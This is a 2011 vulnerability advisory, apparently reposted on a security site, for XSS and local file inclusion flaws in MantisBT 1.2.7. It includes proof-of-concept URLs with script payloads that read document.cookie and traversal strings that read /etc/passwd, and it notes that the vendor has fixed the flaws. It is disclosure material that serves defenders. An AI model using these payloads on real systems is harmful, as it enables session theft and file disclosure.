Bug: MantisBT CMS Multiple Vulnerabilities(SQL/XSS) ( Ascii Version )

Search:
WLB2

MantisBT CMS Multiple Vulnerabilities(SQL/XSS)

Published
Credit
Risk
2011.09.22
High-Tech Bridge SA Security Research Lab
Medium
CWE
CVE
Local
Remote
CWE-79
CWE-22
CVE-2011-3356
CVE-2011-3357
CVE-2011-3358
CVE-2011-3578
No
Yes

Vulnerability ID: HTB23045
Reference: https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_mantisbt.ht
ml
Product: MantisBT
Vendor: www.mantisbt.org ( http://www.mantisbt.org/ )
Vulnerable Version: 1.2.7 and probably prior
Tested Version: 1.2.7
Vendor Notification: 31 August 2011
Vulnerability Type: Local File Inclusion, XSS
Status: Fixed by Vendor
Risk level: High
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in MantisBT, which can be exploited to
perform cross-site scripting, local file inclusion attacks.

1) Input passed via the "action" GET parameter to bug_actiongroup_ext_page.php & bug_actiongroup_page.php
is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected
website.

The following PoC code is available:

http://[host]/bug_actiongroup_ext_page.php?bug_arr[]=1&action=EXT_%22%3E
%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/bug_actiongroup_page.php?bug_arr[]=[ISSUE_ID]&action=EXT_%
22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

2) Input passed via the "action" GET parameter to bug_actiongroup_ext_page.php & bug_actiongroup_page.php
is not properly verified before being used to include files.
This can be exploited to include arbitrary files from local resources via directory traversal sequences and URL-encoded
NULL bytes.

http://[host]/bug_actiongroup_ext_page.php?bug_arr[]=1&action=EXT_/../..
/../../../../../etc/passwd%00
http://[host]/bug_actiongroup_page.php?bug_arr[]=[ISSUE_ID]&action=EXT_/
../../../../../../../etc/passwd%00

3) Input appended to the URL after manage_config_email_page.php & manage_config_workflow_page.php is not properly
sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected
website.

http://[host]/manage_config_email_page.php/%22%3E%3Cimg%20src=1%20onerro
r=%22javascript:alert%28document.cookie%29;%22%3E/
http://[host]/manage_config_workflow_page.php/%22%3E%3Cimg%20src=1%20one
rror=%22javascript:alert%28document.cookie%29;%22%3E/

4) Input passed via the "platform", "os", "os_build", GET parameter to
bug_report_page.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected
website.

http://[host]/bug_report_page.php?platform=%22%3E%3Cscript%3Ealert%28doc
ument.cookie%29;%3C/script%3E
Solution: Upgrade to the most recent version

References:

https://github.com/mantisbt/mantisbt/commit/6ede60d3db9e202044f135001589cce941ff6f0f
https://github.com/mantisbt/mantisbt/commit/5b93161f3ece2f73410c296fed8522f6475d273d
https://bugzilla.redhat.com/show_bug.cgi?id=735514
http://www.openwall.com/lists/oss-security/2011/09/04/2
http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066061.html
http://lists.debian.org/debian-security-tracker/2011/09/msg00012.html
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=640297
https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_mantisbt.html
http://www.securityfocus.com/bid/49448
http://www.securityfocus.com/archive/1/archive/1/519547/100/0/threaded
http://www.openwall.com/lists/oss-security/2011/09/09/9
http://www.openwall.com/lists/oss-security/2011/09/04/1
http://www.mantisbt.org/bugs/view.php?id=13281
http://www.debian.org/security/2011/dsa-2308
http://secunia.com/advisories/45961

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version